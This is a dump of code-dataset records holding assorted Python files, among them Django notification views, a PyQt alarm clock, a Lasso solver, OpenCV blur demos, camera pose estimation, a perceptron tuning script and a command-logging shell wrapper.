NewMarkNotification.objects.filter(related_user=user, viewed=False).order_by('time'):\n notifications.append({'id': notification.id,\n 'link': notification.related_link(),\n 'message': notification.__unicode__()})\n\n for notification in NewWorkNotification.objects.filter(related_user=user, viewed=False).order_by('time'):\n notifications.append({'id': notification.id,\n 'link': notification.related_link(),\n 
'message': notification.__unicode__()})\n return HttpResponse(json.dumps(notifications), content_type=\"application/json\")\n\n\ndef user_to_dict(user):\n us = model_to_dict(user, fields=['id', 'first_name', 'last_name'])\n us['middle_name'] = user.userdata.middle_name\n return us\n\n\n@login_required\ndef view_notification(request):\n data = json.loads(request.body)\n notification = Notification.objects.get(id=data['id'])\n if notification.related_user == request.user:\n notification.viewed = True\n notification.save()\n return HttpResponse(status=200)\n else:\n return HttpResponse(status=403)\n\n\ndef view_all_notification(request):\n for notification in Notification.objects.filter(related_user=request.user):\n notification.viewed = True\n notification.save()\n return HttpResponse(status=200)","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
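The `date_handler` lambda in the record above is the usual `json.dumps(default=...)` hook for date/datetime values; a self-contained illustration with no Django involved (the payload is made up):

    import json
    from datetime import date, datetime

    date_handler = lambda obj: (
        obj.isoformat()
        if isinstance(obj, (datetime, date))
        else None)

    payload = {"due": date(2024, 1, 31), "created": datetime(2024, 1, 1, 9, 30)}
    print(json.dumps(payload, default=date_handler))
    # {"due": "2024-01-31", "created": "2024-01-01T09:30:00"}

Note the trade-off the record makes: returning None for unrecognized types silently serializes them as null, where a stricter handler would raise TypeError.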
+{"seq_id":"608039993","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport datetime\nfrom sqlalchemy import create_engine, MetaData, inspect, Table, insert, select\nimport os\n\n\nDATABASE_URL = os.getenv(\"DATABASE_URL\")\n\n\n\n#Checks if the games being used in the prediction have had their pcntdiffs calculated and stored already\ndef loadPcntDiffData(gamesList):\n engine = create_engine(DATABASE_URL)\n sqlString='select * from pcntdiffstats where game_id in {}'.format(tuple(gamesList['game_id']))\n dataset = pd.read_sql(sqlString,engine)\n dataset.set_index('game_id', inplace=True)\n #Remove NaN values\n for i in dataset.isnull().any().index:\n if dataset.isnull().any()[i] == True:\n print('Nan values found in row',i,'. Replacing these NaNs with zero.')\n dataset[i].replace({np.nan:0},inplace=True)\n if len(dataset) == len(gamesList):\n return dataset\n else:\n raise\n\n\n\ndef AddBinaryVariablesForPred(dataset,binaryVariables={\"home_game\":False}):\n #Add other Variables\n #Handle Home game fixed var\n for var in binaryVariables:\n try:\n if binaryVariables[var]:\n dataset[var] = 1\n else:\n dataset[var] = 0\n except:\n print('ERROR Binary Variable Addition for',var)\n return dataset\n\ndef resultPredictor(model,data):\n print(pd.DataFrame(data).drop('result',axis=0).transpose())\n prediction = model.predict(pd.DataFrame(data).drop('result',axis=0).transpose())\n print(prediction)\n return prediction[0]\n\n\ndef insertPrediction(data):\n engine = create_engine(DATABASE_URL)\n conn = engine.connect()\n meta = MetaData()\n meta.reflect(bind=engine)\n predictions = meta.tables['predictions']\n conn.execute(insert(predictions,data))\n","sub_path":"Scripts/Predictors/Predictor.py","file_name":"Predictor.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"515658719","text":"import sys\n\nfrom PyQt5 import (\n uic, \n QtCore\n)\n\nfrom PyQt5.QtCore import (\n QTimer, \n QTime,\n QUrl\n)\n\nfrom PyQt5.QtWidgets import (\n QApplication, \n QWidget, \n QMainWindow, \n QLCDNumber,\n QMessageBox, \n QTimeEdit, \n QHBoxLayout,\n QDialog,\n QListWidgetItem\n)\n\nfrom PyQt5.QtMultimedia import (\n QMediaPlayer,\n QMediaContent,\n QMediaPlaylist\n)\n\nfrom digital_clock import DigitalClock\nfrom new_alarm_clock_dialog import NewAlarmClockDialog\nfrom alarm_clock_item_widget import AlarmClockItemWidget\nfrom alarm_clock_item import AlarmClockItem\n\nclass MyWidget(QMainWindow):\n def __init__(self):\n super().__init__()\n\n uic.loadUi('ui/alarm_clock_form.ui', self)\n self.initUI()\n\n self.alarm_clock_list = []\n\n self.player = QMediaPlayer()\n self.playlist = QMediaPlaylist()\n self.playlist.setPlaybackMode(QMediaPlaylist.CurrentItemInLoop)\n self.player.setPlaylist(self.playlist)\n\n def initUI(self):\n self.digital_clock = DigitalClock(self.clockWidget)\n self.digital_clock.time_tick.connect(self.time_tick)\n\n clock_widget_layout = QHBoxLayout()\n clock_widget_layout.addWidget(self.digital_clock)\n self.clockWidget.setLayout(clock_widget_layout)\n\n self.addAlarmClockButton.clicked.connect(self.add_alarm_clock)\n\n def closeEvent(self, event):\n\n reply = QMessageBox.question(self, 'Выход',\n \"Вы уверены что хотите выйти? Будильники перестанут работать\", \n QMessageBox.Yes | QMessageBox.No, \n QMessageBox.No)\n\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n def add_alarm_clock(self):\n dialog = NewAlarmClockDialog()\n dialog_result = dialog.exec_()\n\n if (dialog_result == QDialog.Accepted):\n widget_item = QListWidgetItem(self.listWidget);\n\n alarm_clock_item = AlarmClockItem(dialog.nameLineEdit.text(), \n dialog.timeEdit.time(),\n dialog.filePathLineEdit.text())\n alarm_clock_item.alarm.connect(self.alarm)\n self.alarm_clock_list.append(alarm_clock_item)\n\n alarm_clock_item_widget = AlarmClockItemWidget(alarm_clock_item, widget_item, self)\n alarm_clock_item_widget.alarm_clock_remove.connect(self.alarm_clock_remove)\n \n widget_item.setSizeHint(alarm_clock_item_widget.sizeHint());\n self.listWidget.setItemWidget(widget_item, alarm_clock_item_widget);\n \n dialog.deleteLater()\n\n def alarm_clock_remove(self):\n self.listWidget.takeItem(self.listWidget.row(self.sender().list_widget_item))\n self.alarm_clock_list.remove(self.sender().alarm_clock)\n\n def time_tick(self):\n for alarm_clock in self.alarm_clock_list:\n if alarm_clock.is_active:\n alarm_clock.tick()\n\n def alarm(self):\n alarm_clock = self.sender()\n\n self.play_sound(alarm_clock.alarm_sound)\n\n QMessageBox.information(self, 'Будильник',\n 'Будильник \"' + alarm_clock.title + '\"', \n QMessageBox.Ok)\n alarm_clock.is_alarm = False\n self.stop_sound()\n\n def play_sound(self, sound):\n if len(sound):\n self.player.stop()\n self.playlist.clear()\n\n media_content = QMediaContent(QUrl.fromLocalFile(sound))\n self.playlist.addMedia(media_content)\n self.player.play()\n\n def stop_sound(self):\n self.player.stop()\n\napp = QApplication(sys.argv)\nex = MyWidget()\nex.show()\nsys.exit(app.exec_())\n","sub_path":"alarm_clock_test.py","file_name":"alarm_clock_test.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"13546288","text":"import numpy as np\nimport numpy.linalg as LA\n\nPG = \"PG\"\nAPG = \"APG\"\n\nclass Lasso:\n def __init__(self, mu, A, lam, method=APG, tmax=100):\n self.w = np.matrix([[3, -1]])\n self.mu = mu\n self.A = A\n self.lam = lam\n self.eta = 1.0 / float(max(LA.eig(2 * self.A)[0]))\n self.history = [self.w] # sequence of J(w)\n self.tmax = tmax\n if method == APG:\n self.prevW = self.w\n self.s = 0\n self.update = self.updateAPG\n else:\n self.update = self.updatePG\n\n\n def __phi(self, w):\n d = w - self.mu\n return (d * self.A * d.T).tolist()[0][0]\n\n def lossFunction(self, w):\n return self.__phi(w) + self.lam * np.abs(w).sum()\n\n def __phiPrime(self, w):\n d = w - self.mu\n return 2 * d * self.A\n\n def prox_eta(self, mu):\n etalambda = self.eta * self.lam\n return np.matrix([mui - etalambda if mui > etalambda else 0 if - etalambda < mui and mui < etalambda else mui + etalambda for mui in mu.A1.tolist()])\n\n def updatePG(self):\n self.w = self.prox_eta(self.w - self.eta * self.__phiPrime(self.w))\n\n def updateAPG(self):\n prevW = self.w\n s = self.s\n self.s = 0.5 * (1 + np.sqrt(1 + 4 * self.s ** 2))\n v = self.w + (s - 1) * (self.w - self.prevW) / self.s\n self.w = self.prox_eta(v - self.eta * self.__phiPrime(v))\n self.prevW = prevW\n\n def solve(self):\n for _ in range(self.tmax):\n self.update()\n self.history.append(self.w)\n","sub_path":"src/Lasso.py","file_name":"Lasso.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"352062716","text":"# (1) Import Classes to create two separate types of cars\n\n# from car import Car, ElectricCar\n# import electric_car\n# import car\nfrom car import Car\nfrom electric_car import ElectricCar\n\nmy_beetle = Car('volkswagen', 'beetle', 2016)\nmy_tesla = ElectricCar('tesla', 'roadster', 2016)\n\ncars = [my_beetle, my_tesla]\n\nfor car in cars:\n\tprint(car.get_descriptive_name())","sub_path":"book_python_crash_course/ch09/my_cars.py","file_name":"my_cars.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"455141594","text":"import numpy as np\nimport argparse\nimport cv2\n\n##ap = argparse.ArgumentParser()\n##ap.add_argument(\"-i\", \"--image\", required = True,\n##\thelp = \"path to the image\")\n##args = vars(ap.parse_args())\nimage = cv2.imread(\"luffy.jpg\") #use always the same image in folder\ncv2.imshow(\"Orginal\", image)\n\nblurred = np.hstack([\n\tcv2.blur(image, (3, 3)),\n\tcv2.blur(image, (5, 5)),\n\tcv2.blur(image, (7, 7))])\n\ncv2.imshow(\"Averaged\", blurred)\n\nblurred = np.hstack([\n\tcv2.GaussianBlur(image, (3, 3), 0),\n\tcv2.GaussianBlur(image, (5, 5), 0),\n\tcv2.GaussianBlur(image, (7, 7), 0)])\n\ncv2.imshow(\"Gaussian\", blurred)\n\nblurred = np.hstack([\n\tcv2.medianBlur(image, 3),\n\tcv2.medianBlur(image, 5),\n\tcv2.medianBlur(image, 7)])\n\ncv2.imshow(\"medianBlur\", blurred)\n\nblurred = np.hstack([\n\tcv2.bilateralFilter(image, 5, 21, 21),\n\tcv2.bilateralFilter(image, 7, 31, 31),\n\tcv2.bilateralFilter(image, 9, 41, 41)])\n\ncv2.imshow(\"bilateralFilter\", blurred)\ncv2.waitKey(0)","sub_path":"blurring.py","file_name":"blurring.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"135365641","text":"import numpy as np\n\ndef recoverPose(pts1_, pts2_, E, optimize = False):\n \n \"\"\"\n given a set of points and essential matrix, estimate pose\n \"\"\"\n \n if (pts1_.shape[1] == 2) or (pts1_.shape[1] == 2): \n pts1_,pts2_ = homo(pts1_),homo(pts2_)\n\n ### estimate all 4 mathematically possible poses###\n poses = estimatePoses(E)\n\n max_positiveZ, correctPose = 0, None\n \n ## choose the only physically possible pose\n for pose in poses: \n ## get 3D points ##\n pts3D = LinearTriangulation(pts1_, pts2_, pose) \n \n # if optimize:\n ## perform non linear optimization\n \n ### get n positive depths of the pose###\n n_positiveZ = ChieralityCheck(pts3D, pose)\n ## choose the pose with most positive depth results.\n if n_positiveZ >= max_positiveZ :\n max_positiveZ = n_positiveZ\n correctPose = pose\n\n return correctPose\n\ndef LinearTriangulation(pts1, pts2, pose):\n \n \"\"\"\n To perform linear triangulation,\n np.cross(x,P)X = 0 and np.cross(x',P')X = 0 relationships need to be satisfied.\n X : 3D point \n x : 2d image point \n P : projection matrix\n\n Reference: http://www.cs.cmu.edu/~16385/s17/Slides/11.4_Triangulation.pdf\n \"\"\" \n # Following the general parameterization of dependant images, \n #Pose1 is a reference frame, Pose2 is our estimated pose\n Pose1, Pose2 = np.eye(3,4), pose\n pts3D = []\n for x1, x2 in zip(pts1, pts2): \n x1P1 = cross_1Dx4D(x1,Pose1)\n x2P2 = cross_1Dx4D(x2,Pose2)\n A = np.vstack((x1P1, x2P2))\n\n _,_,Vt = np.linalg.svd(A)\n X = Vt[-1]\n X = X/X[-1]\n pts3D.append(X[:3]) \n return np.array(pts3D)\n\ndef ChieralityCheck(pts3D, pose):\n r3 = pose[:,2]\n c = pose[:,2]\n# r3 = pose[2, :3]\n# c = pose[:, 3]\n n_positiveZ = 0\n for X in pts3D:\n # cheirality condition\n if (r3 @ (X - c)) > 0:\n n_positiveZ += 1\n return n_positiveZ\n\ndef homo(pts):\n return np.column_stack((pts, np.ones(len(pts)).reshape(-1,1)))\n\ndef cross_1Dx4D(x,P):\n \"\"\"\n to find cross product between a 1D vector and 4D projection matrix\n \"\"\"\n x_3x3 = np.array([[0, -x[2], x[1]],\n [x[2], 0, -x[0]],\n [-x[1], x[0], 0]])\n return x_3x3 @ P\n\n\ndef estimatePoses(E):\n U, _, Vt = np.linalg.svd(E, full_matrices=True)\n W = np.array([\n [0, -1, 0],\n [1, 0, 0],\n [0, 0, 1]])\n\n R12 = U @ W @ Vt\n R34 = U @ W.T @ Vt\n C = U[:, 2]\n \n poses = np.array([np.column_stack((R12, C)),\n np.column_stack((R12, -C)),\n np.column_stack((R34, C)),\n np.column_stack((R34, -C))])\n\n poses = signcheck(poses)\n \n return poses\n\ndef signcheck(poses):\n poses_ = []\n for pose in poses:\n r = pose[:, :3]\n if np.linalg.det(r) <0:\n poses_.append(-pose)\n else:\n poses_.append(pose)\n return poses_\n","sub_path":"Code/misc/.ipynb_checkpoints/PoseEstimation-checkpoint.py","file_name":"PoseEstimation-checkpoint.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"212847948","text":"from boosting_decision_making import feature_encoder\n\n\nclass FeatureEncodingConfigurer:\n\n def __init__(self):\n self.feature_dict_with_encodings = {}\n\n def initialize_encoders_from_config(self, config_str):\n self.feature_dict_with_encodings = {}\n for str_part in config_str.split(\";\"):\n if not str_part.strip():\n continue\n config_parts = str_part.split(\"|\")\n feature_name = int(config_parts[0])\n field_name = config_parts[1]\n encoding_type = config_parts[2]\n max_features = int(config_parts[3])\n ngram_max = int(config_parts[4])\n self.feature_dict_with_encodings[feature_name] = feature_encoder.FeatureEncoder(\n field_name=field_name, encoding_type=encoding_type,\n max_features=max_features, ngram_max=ngram_max)\n\n def initialize_encoders_from_objects(self, feature_info):\n self.feature_dict_with_encodings = {}\n for feature in feature_info:\n _feature_encoder = feature_encoder.FeatureEncoder()\n self.feature_dict_with_encodings[feature_info] = _feature_encoder.load_from_feature_info(\n feature_info[feature])\n\n def prepare_encoders(self, data):\n for feature in self.feature_dict_with_encodings:\n self.feature_dict_with_encodings[feature].fit(data)\n","sub_path":"boosting_decision_making/feature_encoding_configurer.py","file_name":"feature_encoding_configurer.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"426953128","text":"\"\"\"\r\nThis code finds good parameters for achieving excellent achievement on\r\nperceptrons (one vs all)\r\n\"\"\"\r\n\r\nif __name__ == '__main__':\r\n import numpy as np\r\n import os\r\n import matplotlib.pyplot as plt\r\n from read_iris import read_iris_dataset\r\n from perceptron_one_vs_all import perceptron_one_vs_all\r\n import json\r\n from k_fold import k_fold_cross_validation\r\n from sklearn import preprocessing\r\n import sys\r\n import warnings\r\n\r\n order = '2'\r\n cut_error = None\r\n max_epochs = 200\r\n K_fold = 10\r\n\r\n # write in file\r\n file = open('find_good_perceptrons.txt', 'w')\r\n ratio_of_train_set = 0.7\r\n ratio_of_valid_set = 0.15\r\n ratio_of_test_set = 0.15\r\n min_test_error = 10000.0\r\n best_learning = np.inf\r\n best_random_state=np.inf\r\n\r\n for random_state in range(0, 7):\r\n\r\n # read train and test from iris dataset\r\n trainX, validX, testX, trainY, validY, testY = read_iris_dataset(rand_state=random_state,\r\n train_ratio=ratio_of_train_set,\r\n valid_ratio=ratio_of_valid_set,\r\n test_ratio=1 - (ratio_of_train_set + ratio_of_valid_set),\r\n order=order)\r\n # print(trainX, testX, trainY, testY)\r\n # standard scaler\r\n scaler = preprocessing.StandardScaler().fit(trainX)\r\n trainX = scaler.transform(trainX)\r\n validX = scaler.transform(validX)\r\n testX = scaler.transform(testX)\r\n\r\n # map labels name\r\n map = {'Iris-setosa': 1, 'Iris-versicolor': 2, 'Iris-virginica': 3}\r\n temp = np.zeros(trainY.shape, dtype=int)\r\n for idx, label in enumerate(trainY):\r\n temp[idx] = map[trainY[idx][0]]\r\n trainY = np.copy(temp)\r\n\r\n temp = np.zeros(validY.shape, dtype=int)\r\n for idx, label in enumerate(validY):\r\n temp[idx] = map[validY[idx][0]]\r\n validY = np.copy(temp)\r\n\r\n temp = np.zeros(testY.shape, dtype=int)\r\n for idx, label in enumerate(testY):\r\n temp[idx] = map[testY[idx][0]]\r\n testY = np.copy(temp)\r\n\r\n\r\n for learning_rate in np.arange(0.001, 0.03, 0.003):\r\n\r\n # train perceptrons (all vs on)\r\n units = perceptron_one_vs_all(number_classes=3, learning_rate=learning_rate, max_epoch=max_epochs,\r\n cut_error=cut_error)\r\n k_fold_units = perceptron_one_vs_all(number_classes=3, learning_rate=learning_rate, max_epoch=max_epochs,\r\n cut_error=cut_error)\r\n\r\n # train perceptrons\r\n units.fit(X=trainX, y=trainY, validX=validX, validY=validY,\r\n classes_name=['Iris-setosa', 'Iris-versicolor', 'Iris-virginica'],\r\n rand_state=random_state, plotting=False, write_in_file=False)\r\n\r\n # calculate K-Fold Error\r\n train_arguments = {'classes_name': ['Iris-setosa', 'Iris-versicolor', 'Iris-virginica'],\r\n 'rand_state': random_state, 'plotting': False, 'write_in_file': False}\r\n\r\n k_fold_error = k_fold_cross_validation(learner=k_fold_units, argument_of_learner=train_arguments,\r\n X=np.copy(trainX), y=np.copy(trainY), k=K_fold)\r\n\r\n file.write('\\nVV======================VVV=======================VV')\r\n print('===================================================V')\r\n file.write('\\nlearning_rate: {}'.format(learning_rate))\r\n print('learning_rate: {}'.format(learning_rate))\r\n file.write('\\nrandom state: {}'.format(random_state))\r\n print('random state: {}'.format(random_state))\r\n file.write('\\nratio of train set: {}'.format(ratio_of_train_set))\r\n print('ratio of train set: {}'.format(ratio_of_train_set))\r\n\r\n # error of perceptrons(one vs all) for training set\r\n pred = []\r\n for x in trainX:\r\n prediction = units.predict(x)\r\n # print(prediction)\r\n 
pred.append(prediction)\r\n\r\n train_error = 0\r\n for _ in range(0, len(pred)):\r\n if pred[_] != trainY[_]:\r\n train_error += 1\r\n\r\n file.write('\\n{0}-fold-cross-validation error is: {1}'.format(K_fold, k_fold_error))\r\n print('{0}-fold-cross-validation error is: {1}'.format(K_fold, k_fold_error))\r\n file.write('\\nTrain Error(Ordinary Error, not k-fold)= {0}'.format(train_error / len(pred)))\r\n print('Train Error(Ordinary Error, not k-fold)= {0}'.format(train_error / len(pred)))\r\n\r\n # error of perceptrons(one vs all) for test set\r\n pred = []\r\n for x in testX:\r\n prediction = units.predict(x)\r\n pred.append(prediction)\r\n\r\n test_error = 0\r\n for _ in range(0, len(pred)):\r\n if pred[_] != testY[_]:\r\n test_error += 1\r\n\r\n file.write('\\nTest Error= {0}'.format(test_error / len(pred)))\r\n print('Test Error= {0}'.format(test_error / len(pred)))\r\n\r\n if min_test_error > (test_error / len(pred)):\r\n min_test_error = test_error / len(pred)\r\n best_random_state = random_state\r\n best_learning = learning_rate\r\n\r\n file.write('\\n===================================================^\\n')\r\n print('===================================================^')\r\n\r\n print('\\n********************************')\r\n file.write('\\n********************************')\r\n print('min test error: {}'.format(min_test_error))\r\n file.write('\\nmin test error: {}'.format(min_test_error))\r\n print('best learning rate: {}'.format(best_learning))\r\n file.write('\\nbest learning rate: {}'.format(best_learning))\r\n print('best random state: {}'.format(best_random_state))\r\n file.write('\\nbest random state: {}'.format(best_random_state))\r\n\r\n file.close()","sub_path":"Assignment 1/part1-classification/best_perceptron_one_vs_all.py","file_name":"best_perceptron_one_vs_all.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
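The script above pulls `k_fold_cross_validation` from a local module; what k-fold index splitting boils down to, in a numpy-only sketch (the helper name, seed, and fold count are illustrative):

    import numpy as np

    def k_fold_indices(n_samples, k, seed=0):
        idx = np.random.default_rng(seed).permutation(n_samples)
        for fold in np.array_split(idx, k):
            yield np.setdiff1d(idx, fold), fold  # (train indices, validation indices)

    for train, valid in k_fold_indices(10, k=5):
        print(len(train), len(valid))  # 8 2, five times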
+{"seq_id":"343726463","text":"\n\nfrom xai.brain.wordbase.nouns._solvent import _SOLVENT\n\n#calss header\nclass _SOLVENTS(_SOLVENT, ):\n\tdef __init__(self,): \n\t\t_SOLVENT.__init__(self)\n\t\tself.name = \"SOLVENTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"solvent\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_solvents.py","file_name":"_solvents.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"539309324","text":"#!/usr/bin/env python3\n# shell wrapper for superior logging\n# logs as CSV with time,hostname,network:ip,who,command.\n# requires Python 3+\n#\n# 2020 - Douglas Berdeaux\nimport readline\nimport os # for the commands, of course. These will be passed ot the shell.\nimport subprocess # for piping commands\nimport sys # for exit\nimport re # regexps\nimport ifaddr # NIC info\nimport socket # for HOSTNAME\nimport getpass # for logging the username\nimport datetime # for logging the datetime\n\nADAPTERS = ifaddr.get_adapters() # get network device info\nNET_DEV = \"\" # store the network device\nHOSTNAME = socket.gethostname() # hostname for logging\nUID = getpass.getuser()\nREDIRECTION_PIPE = '_'\nVERSION=\"v0.4.17.0\"\nLOG_DAY=datetime.datetime.today().strftime('%Y-%m-%d')\nLOG_FILENAME = os.path.expanduser(\"~\")+\"/.dps/\"+LOG_DAY+\"_dps_log.csv\"\nPATHS=os.getenv('PATH').split(\":\")\n\n# Set up the log file directory:\nif not os.path.exists(os.path.join(os.path.expanduser(\"~\"),\".dps\")):\n os.mkdir(os.path.join(os.path.expanduser(\"~\"),\".dps\"))\n# Set up the log file itself:\nif not os.path.exists(LOG_FILENAME):\n with open(LOG_FILENAME,'a') as log_file:\n log_file.write(\"When,Host,Network,Who,Where,What\\n\")\n# Get the adapter and IP address:\n#for adapter in ADAPTERS:\n #if re.match(\"^e..[0-9]+\",adapter.nice_name):\n #NET_DEV = adapter.nice_name+\":\"+adapter.ips[0].ip\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nreadline.parse_and_bind('tab: complete')\nreadline.parse_and_bind('set editing-mode vi')\n\ndef log_cmd(cmd): # logging a command:\n with open(LOG_FILENAME,'a') as log_file:\n log_file.write(str(datetime.datetime.now())+\",\"+HOSTNAME+\",\"+str(NET_DEV)+\",\"+UID+\",\"+os.getcwd()+\",\"+cmd+\"\\n\")\n return 0\n\ndef run_cmd(cmd):\n\n cmd_delta = cmd\n cmd_delta = re.sub(\"~\",os.path.expanduser(\"~\"),cmd_delta)\n cmd_delta = re.sub(\"^\\s+\",\"\",cmd_delta) # remove any prepended spaces\n log_cmd(cmd_delta) # first, log the command.\n\n # Handle built-in commands:\n if (cmd_delta == \"exit\" or cmd_delta == \"quit\"):\n sys.exit()\n return 0\n elif(cmd_delta==\"help\"):\n print(\"Help: ... 
\")\n elif(cmd_delta==\"version\"):\n print(bcolors.OKGREEN+VERSION+bcolors.ENDC)\n elif(re.match(\"^ls\",cmd_delta)):\n cmd_delta = re.sub(\"^ls\",\"ls --color=auto\",cmd)\n subprocess.call([\"/bin/bash\", \"--init-file\",\"/root/.bashrc\", \"-c\", cmd_delta])\n elif(re.match(\"^cd\",cmd_delta)):\n dir = re.sub('^cd\\s+','',cmd_delta) # take off the path\n dir = re.sub('\\s+$','',dir) # remove trailing spaces\n if (re.match(\"^cd(\\s+)?\",dir)): # go home\n dir = os.path.expanduser(\"~\")\n if (dir==\"\"):\n dir=os.path.expanduser(\"~\")\n if os.path.isdir(dir): # does it even exist?\n os.chdir(dir) # goto path\n else:\n print(\"PATH: \"+bcolors.FAIL+'\"'+dir+'\"'+bcolors.ENDC+\" does not exist.\")\n else:\n subprocess.call([\"/bin/bash\", \"--init-file\",\"/root/.bashrc\", \"-c\", cmd_delta])\n shell() # or else return to shell\n\ndef list_folder(path):\n \"\"\"\n Lists folder contents\n \"\"\"\n # starts with \"/\"\n if path.startswith(os.path.sep):\n # absolute path\n basedir = os.path.dirname(path)\n contents = os.listdir(basedir)\n # add back the parent\n contents = [os.path.join(basedir, d) for d in contents]\n else:\n # absolute (home) path:\n if path.startswith(\"~/\"):\n contents = os.listdir(os.path.expanduser(\"~/\"))\n else:\n # This could be a command so try paths:\n # TODO get environment $PATH's and break them up testing each one:\n contents=os.listdir(os.curdir)\n for path_entry in PATHS:\n try: # just learnt my first try/catch in Python - woohoo! :D\n contents+=os.listdir(path_entry)\n except:\n pass\n return contents\n\n\ndef completer(text, state):\n \"\"\"\n Our custom completer function\n \"\"\"\n options = [x for x in list_folder(text) if x.startswith(text)]\n return options[state]\n\nreadline.set_completer(completer)\nreadline.parse_and_bind('tab: complete')\nreadline.set_completer_delims('~ \\t\\n`!@#$%^&*()-=+[{]}\\\\|;:\\'\",<>?')\n\ndef shell():\n last_string = input(UID+bcolors.BOLD+\"@\"+bcolors.ENDC+HOSTNAME+bcolors.BOLD+\"[\"+bcolors.ENDC+os.getcwd()+bcolors.BOLD+\"]\"+\">> \"+bcolors.ENDC)\n run_cmd(last_string)\nprint(bcolors.BOLD+\n\"\"\"\n *** Welcome to the Demon Pentest Shell\n *** Type exit to return to standard shell\n\"\"\"\n+bcolors.ENDC)\nshell() # start the app\n","sub_path":"dps.py","file_name":"dps.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"123777078","text":"# -*- coding: utf-8 -*-\n#########\n#Copyright (C) 2014 Mark Spurgeon \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n#########\nimport os\nfrom PyQt4.QtGui import QIcon\nimages = [\n\t\"jpg\",\n\t\"JPG\",\n\t\"png\",\n\t\"svg\"\n]\nvideos = [\n\t\"mp4\",\t\n\t\"avi\"\n]\nsounds = [\n\t\"mp3\",\n\t\"wav\"\n]\nclass getFiles():\n\tdef __init__(self):\n\t\tself.directory=os.getenv(\"HOME\")#varies\n\t\tself.default=os.getenv(\"HOME\")#Doesn't vary\n\tdef all(self):\n\t\tall=[]\n\t\tfor f in os.listdir(self.directory):\n\t\t\tif f.startswith(\".\"):\n\t\t\t\tf=None\n\t\t\telif f.endswith(\"~\"):\n\t\t\t\tf=None\n\t\t\tif f!=None:\n\t\t\t\tdict={}\n\t\t\t\tdict[\"name\"]=f\n\t\t\t\twhole_f=os.path.join(self.directory,f)\n\t\t\t\tif os.path.exists(whole_f):\n\t\t\t\t\tif os.path.isdir(whole_f):\n\t\t\t\t\t\tdict[\"type\"]=\"directory\"\n\t\t\t\t\telif os.path.isfile(whole_f):\n\t\t\t\t\t\tdict[\"type\"]=\"file\"\n\t\t\t\t\tdict[\"whole_path\"]=str(whole_f)\n\t\t\t\t\tall.append(dict)\n\t\t\t\telse:print(\"Path doesn't exist\")\n\t\treturn all\n\t\t#return [{\"type\":\"folder\", \"name\":\"name\", \"whole_path\":\"/home/usr/folder\"}, ..]\ndef getFileIcon(name):\n\t#extension\n\text=name.split('.')[-1:][0]\n\ticon=QIcon.fromTheme(name)\n\tif not icon.isNull():\n\t\treturn icon\t\n\telif ext in images:\t\n\t\tif os.path.isfile(name):\n\t\t\treturn QIcon(name)\n\t\t'''\n\telif ext in images:\t\n\t\tif os.path.isfile(name):\n\t\t\treturn QIcon(\"/usr/share/duck-launcher/icons/files/file-picture.svg\")\n\t\t'''\n\telif ext in videos:\n\t\tif os.path.isfile(name):\n\t\t\treturn QIcon(\"/usr/share/duck-launcher/icons/files/file-video.svg\")#will be video file icon\n\telif ext in sounds:\n\t\tif os.path.isfile(name):\n\t\t\treturn QIcon(\"/usr/share/duck-launcher/icons/files/file-sound.svg\")#will be sound file icon\n\telse:\n\t\treturn QIcon(\"/usr/share/duck-launcher/icons/file.svg\")\nif __name__==\"__main__\":\n\tf =getFiles()\n\tf.directory=\"/home/mark\"\n\tf.all()\n","sub_path":"duck_launcher/Files.py","file_name":"Files.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
